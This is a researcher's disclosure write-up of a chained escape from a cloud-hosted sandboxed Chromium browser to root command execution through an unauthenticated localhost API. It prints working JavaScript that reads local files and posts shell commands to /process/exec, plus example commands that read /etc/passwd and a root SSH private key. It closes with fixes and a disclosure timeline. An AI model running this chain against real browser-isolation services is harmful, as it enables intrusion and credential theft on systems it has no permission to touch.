I Was Supposed to Only Have a Browser
How I escaped a sandboxed Chromium environment and got root-level command execution through a chain of overlooked security gaps

I was testing a cloud-based browser environment. You SSH in and all you get is a Chromium window -- that's your entire interface, there's nothing else.
Spent about an hour trying things that didn't work before I found something that did. After that it went fast. Five separate issues, none of them critical on their own, but one led to the next and I ended up breaking out of the browser with root access on the host.
What I Was Looking At
A Chromium browser running inside a container. The only thing you're supposed to have is the browser window -- you shouldn't be able to touch the host at all.
If you're not familiar with this kind of setup -- the idea is that you take a browser, run it inside a container (like Docker), and restrict what it can do. Users can browse the web but can't read the server's files, run commands, or mess with other services on the same machine. Like a hotel room -- you can use everything in the room but you can't walk into the kitchen or the manager's office.
None of it held up.
Dead Ends First
I spent a while on stuff that didn't work before finding what did. I'm including the failures because this is how it actually goes -- you try the obvious stuff, it all fails, and then something unexpected works.
Direct fetch() to local files:
fetch('file:///home/kernel/Downloads/start_all.sh')
.then(r => r.text())
.catch(e => console.log(e))
// CORS policy blocks file:// requests
Blocked. CORS on file:// URLs. Fair enough.
If you haven't dealt with CORS before: CORS (Cross-Origin Resource Sharing) is a browser security feature that stops a web page from making requests to a different domain. If you're on https://google.com, your JavaScript can't reach out to https://mybank.com and pull data -- the browser blocks it unless mybank.com explicitly allows it through HTTP headers. The file:// protocol (opening local files in a browser) counts as its own origin, so CORS blocks requests between file:// and http://.
XMLHttpRequest:
var xhr = new XMLHttpRequest();
xhr.open('GET', 'file:///home/kernel/Downloads/start_all.sh', false);
xhr.send();
// CORS error
Same wall. Different API, same restriction.
HTML element tricks:
Tried <iframe>, <object>, <embed> pointing at file:// URLs. All blocked by CORS. Tried Service Worker Cache API -- "Request scheme 'file' is unsupported."
Standard approaches were all blocked. So I started looking sideways.
Finding the Crack: What's Available in window?
When the obvious stuff doesn't work, I like to check what I actually have access to. Dumped every function on the window object:
Object.keys(window).filter(k => typeof window[k] === 'function')
Most of it was standard -- alert, atob, blur, fetch, the usual. But a few stood out:
"showOpenFilePicker"
"showSaveFilePicker"
"webkitRequestFileSystem"
"webkitResolveLocalFileSystemURL"
showOpenFilePicker() -- the File System Access API. It's meant for web apps that let users pick files for upload (Google Docs uses it). Opens the native OS file picker dialog, gives you file handles you can read with JavaScript.
Why did this work when fetch() didn't? fetch() is code-initiated, so the browser runs it through CORS. showOpenFilePicker() pops up a dialog and the user physically clicks on a file -- the browser treats that as the user granting permission, so CORS never gets involved. Makes sense for document editors. In a locked-down browser environment, it means you can read anything the file picker can navigate to.
showOpenFilePicker().then(handles => {
handles[0].getFile().then(file => {
const reader = new FileReader();
reader.onload = (e) => {
console.log(e.target.result);
};
reader.readAsText(file);
});
})
A file picker opened. I navigated to /home/kernel/Downloads/. Selected wrapper.sh. And the contents appeared in my console.
I could read files.
Reading the System's Blueprints
From here, the rest came quick.
wrapper.sh had the startup sequence:
#!/bin/bash
# starts various services
supervisorctl -c /etc/supervisor/supervisord.conf start kernel-images-api
# handle Chromium launch
# ... xdotool automation to dismiss sandbox warnings ...
while ! nc -z 127.0.0.1 "${API_PORT}"; do
sleep 0.5
done
If you haven't seen supervisord before -- it's a process manager for Linux. Starts, stops, and watches programs. The supervisorctl start kernel-images-api line launches a service called kernel-images-api. The nc -z loop at the bottom keeps checking if something is listening on the API port and waits until it responds. So there's definitely an API running, and the system won't start without it.
start_all.sh had the port:
export API_PORT=10001
export KERNEL_IMAGES_API_PORT=10001
Port 10001. Now I knew where to look.
Quick note on file:// if you're not familiar: when you type file:///some/path in a browser, you're reading directly from the local filesystem instead of fetching from a web server. On your laptop, that's fine -- those are your files. In a containerized environment, "local filesystem" means the container's filesystem, which has system files, configs, and logs the user was never supposed to see.
The file:// protocol gave me more than just the Downloads folder. I could browse everything:
file:///var/log/supervisord/ --> all supervisor logs
file:///etc/passwd --> full user list
file:///home/kernel/extensions/ --> browser extensions
The supervisor logs were the real find. They showed API requests:
POST http://localhost:10001/process/exec
POST http://localhost:10001/computer/execute
/process/exec. That's a pretty suggestive endpoint name.
But knowing an endpoint exists and knowing how to call it are different things. I still needed to figure out the request format -- what method, what headers, what the payload looks like.
I started by navigating to http://localhost:10001 and poking around in DevTools. Tried a few GET requests to see what the API would tell me about itself. The root path returned a 404 but some endpoints returned JSON responses that gave away the structure. I could see from the network tab that previous requests used POST with Content-Type: application/json.
Then I tried sending a basic POST to /process/exec with a JSON body. First attempt got a 500 error back -- but the error response itself was useful because it showed what the API expected. The response format had fields like stdout_b64, stderr_b64, exit_code, and duration_ms. So the API takes a command, runs it, and returns the output base64-encoded.
I also checked /usr/local/sbin/ through the file picker to see if the actual binary or any docs were lying around that would confirm the payload format. Between the log entries, the error responses, and the files on disk, I had enough to piece together the full request:
POST /process/exec
Content-Type: application/json
{"command": "some shell command"}
Response comes back as:
{
"duration_ms": 1,
"exit_code": 0,
"stdout_b64": "<base64 encoded output>",
"stderr_b64": ""
}
Now I just needed to get past CORS to actually make the call from the browser.
The Chrome Extension with Hardcoded Credentials
I also noticed a custom Chrome extension -- a proxy extension called chromeproxy.
file:///home/kernel/extensions/chromeproxy/
Three files: background.js, background.js.template, manifest.json.

The background.js had the proxy configuration in plain text:
var config = {
mode: "fixed_servers",
rules: {
singleProxy: {
scheme: "http",
host: "XX.XX.XX.XX",
port: 61234,
},
bypassList: [
"localhost",
"*.onkernel.com",
"*.ts.net",
],
},
};
chrome.proxy.settings.set({ value: config, scope: "regular" }, function () {});
function callbackFn(details) {
return {
authCredentials: {
username: "XXXXXXXXXX",
password: "XXXXXXXXXX",
},
};
}
chrome.webRequest.onAuthRequired.addListener(
callbackFn,
{ urls: ["<all_urls>"] },
["blocking"]
);
Proxy username and password, hardcoded in JavaScript, readable by anyone in the browser environment. The extension also had "Allow access to file URLs" toggled on and permissions to read all your data on all websites. Not part of the RCE chain directly, but not great either.
For context: a proxy server sits between your browser and the internet. All your web traffic goes through it. Having the proxy creds means you could set up your own browser to use the same proxy, or potentially see what traffic flows through it. The bypassList is also useful -- it tells you which domains are internal (*.onkernel.com, *.ts.net) and don't go through the proxy, which is basically free reconnaissance about the company's infrastructure.
CORS Gets in the Way (Briefly)
So I had an API on localhost:10001 with an endpoint called /process/exec. Tried calling it.
fetch('http://localhost:10001/process/exec', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({command: 'id'})
})
// Error: CORS policy blocks this request
CORS again. Browser origin is file://, API is http://localhost:10001. Different origins, blocked.
One thing about CORS that matters here: it's enforced by the browser, not the server. The API doesn't care where the request came from -- it'll respond to anything. The browser checks the response headers and decides whether to let your JavaScript see the result. So CORS only matters if the attacker is using a browser. Someone with curl wouldn't even know CORS was a thing.
And even in the browser, there's a workaround. Same-origin requests skip CORS entirely. Your origin is whatever URL is in the address bar. At file://? That's your origin. Navigate to http://localhost:10001? Now that's your origin. And requests from http://localhost:10001 to http://localhost:10001/process/exec are same-origin. No CORS check happens at all.
Typed http://localhost:10001 in the address bar. 404 page. Didn't care. Right origin.
Root
F12. Console. Typed:
fetch('/process/exec', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({command: 'id'})
}).then(r => r.json()).then(d => console.log(atob(d.stdout_b64)));
uid=0(root) gid=0(root) groups=0(root)
Root.
Zero auth on the endpoint. Send a command, get the output back in base64, and it runs everything as root.
If atob(data.stdout_b64) looks weird -- base64 is just an encoding that turns data into ASCII text. Not encryption, anyone can decode it. The API sends output in base64, atob() decodes it back. So cm9vdA== becomes root.
At this point I could run whatever I wanted:
// read /etc/passwd
{command: 'cat /etc/passwd'}
// list all processes (all running as root)
{command: 'ps aux'}
// read SSH keys
{command: 'cat /root/.ssh/id_rsa'}
// check the network
{command: 'netstat -tlnp'}
Everything running as root. Every file readable. I was well outside the browser at this point.
The Full Chain
The full attack path:
Step 1: Enumerate window APIs
Found showOpenFilePicker() available
|
v
Step 2: Read local files via File Picker
Read wrapper.sh, start_all.sh
Discovered API on port 10001
|
v
Step 3: Browse filesystem via file:// protocol
Read supervisor logs
Found /process/exec endpoint
Found hardcoded proxy credentials
|
v
Step 4: Navigate to http://localhost:10001
Bypassed CORS by matching origin
|
v
Step 5: POST to /process/exec
No authentication required
Commands execute as root
|
v
Full system compromise
If you look at each piece on its own, none of it is that bad. The file picker is doing what file pickers do. Browsing local files is a browser feature. Logs being readable is common. Navigating to localhost is how browsers work. An internal API without auth isn't unusual for services that aren't supposed to be reachable.
But when one leads to the next, you end up with root on the host from a browser that was supposed to be your only access.
What Should Have Stopped This
Five layers could have stopped this. All five missed:
Layer 1: File System Access
Expected: Browser can't read system files
Actual: file:// protocol enabled, showOpenFilePicker() available
Fix: Disable file:// protocol (--disable-file-url-access)
or restrict to user home only
Layer 2: Information Isolation
Expected: User can't see system architecture
Actual: Shell scripts and logs reveal services, ports, endpoints
Fix: Don't put startup scripts in accessible directories
Restrict log file permissions (chmod 750)
Layer 3: Network Isolation
Expected: Browser can't reach host services
Actual: localhost:10001 fully accessible
Fix: Network namespace isolation
Block localhost access from browser process
Layer 4: API Authentication
Expected: Even if reached, API requires auth
Actual: Zero authentication on /process/exec
Fix: API key, JWT, mutual TLS -- anything
Layer 5: Privilege Separation
Expected: Even if API is exploited, damage is limited
Actual: Everything runs as root
Fix: Run API as unprivileged user with minimal permissions
Any one of these, done right, would have killed the chain or at least limited what I could do with it.
The Hardcoded Credentials Problem
Separate issue from the RCE, but the background.js file also contained:
authCredentials: {
username: "XXXXXXXXX",
password: "XXXXXXXXX",
}
HTTP proxy credentials for routing all browser traffic. Plaintext JavaScript, readable from file:// or the Extensions page, same creds showing up in the proxy auth dialog. If this proxy is shared across instances, those credentials work for all of them.
Don't put credentials in client-side code. Per-session tokens, env vars that aren't browser-readable, or server-side proxy auth -- any of those would have been fine.
What Defense in Depth Actually Means
Defense in depth is a security concept where you never rely on a single protection. Multiple layers, each one assuming the one before it already failed. Like a building -- you don't just lock the front door. You have a deadbolt, a camera, an alarm, and a safe inside. Someone picks the lock? Alarm gets them. Alarm fails? Safe protects the valuables.
Here, the whole security model was one layer: the browser itself. Once I got past what the browser was supposed to restrict, there was nothing behind it.
What it should have looked like:
Even if the browser restrictions fail:
-> File permissions prevent reading system configs
-> Even if configs are read:
-> Network isolation prevents reaching host APIs
-> Even if APIs are reached:
-> Authentication prevents unauthorized calls
-> Even if auth is bypassed:
-> The API runs as an unprivileged user
-> Even if the user has some access:
-> Command whitelisting prevents arbitrary execution
Every layer assumes the one above it already failed. That's the whole idea.
Timeline
| Date | Event |
|---|---|
| January 17, 2026 | Started exploring the browser environment |
| January 17, 2026 | Discovered file reading via showOpenFilePicker() |
| January 17, 2026 | Found unauthenticated API, achieved RCE as root |
| January 28, 2026 | Full disclosure report submitted |
Few hours total. Most of that was dead ends. Once showOpenFilePicker() worked, the rest took maybe 15 minutes.
SWAG
The Kernel team sent me some nice swag.
Some might say "oh, that's it?" -- honestly I don't really care. I had fun poking around and discovering new things, and that's what matters the most to me.
Quick Reference: Concepts Used in This Post
If any of the terms here were new to you:
| Term | What It Is |
|---|---|
| Browser isolation | Restricting a browser so users can only browse the web -- no file access, no host services, no command execution |
| CORS | Browser feature that blocks web pages from making requests to a different domain than the one they came from |
| Same-origin policy | Two URLs are "same origin" if they share the same protocol, host, and port. file:// and http://localhost are different origins |
file:// protocol |
Tells the browser to read directly from the local filesystem instead of fetching from a web server |
showOpenFilePicker() |
Browser API that opens the OS file picker dialog, bypasses CORS because it's treated as user-initiated |
| Base64 | An encoding (not encryption) that turns data into ASCII text. atob() decodes it, btoa() encodes it |
| Supervisord | A process manager that starts, stops, and monitors programs on Linux systems |
| RCE | Remote Code Execution -- the ability to run arbitrary commands on a system you shouldn't have access to |
| Defense in depth | Security principle: multiple independent layers of protection, each assuming the previous one failed |
| Privilege separation | Running services with the minimum permissions they need, so a compromise doesn't give full system access |
Key Takeaways
If you're building browser-only environments:
--disable-file-url-accesson Chromium. There's no reason a restricted browser needs to read local files.Network namespaces. The browser shouldn't be able to hit
localhoston the host. If it needs internet, proxy it -- but don't hardcode the proxy creds in a readable extension.Auth on internal APIs. "Only trusted processes can reach this port" is the assumption that gets you owned when someone breaks out of the browser.
Drop privileges. If the API ran as a locked-down user instead of root, this whole thing would have ended at a useless shell.
Don't leave shell scripts and log files in directories the browser can read. That's how I found the API in the first place.
If you're doing security research:
When the standard stuff is blocked, enumerate what you have.
Object.keys(window)showed meshowOpenFilePicker(). A legit browser API used in a way nobody planned for.CORS is not a security boundary. Change your origin and it goes away.
Look for chains.
showOpenFilePicker()alone isn't a vuln. Neither is a localhost API. But stacked together they're a full compromise.Read everything. Log files, startup scripts, extension source code. The thing that breaks the whole system is usually sitting in a file nobody thought to protect.
Everything in this write-up was a normal feature doing exactly what it was built to do. The file picker works as designed. The file protocol works as designed. CORS works as designed. The problem was that the browser was the only thing between the user and the system, and once I got past it, everything behind it was wide open. If you're giving untrusted users browser-only access, plan for someone to get past the browser.





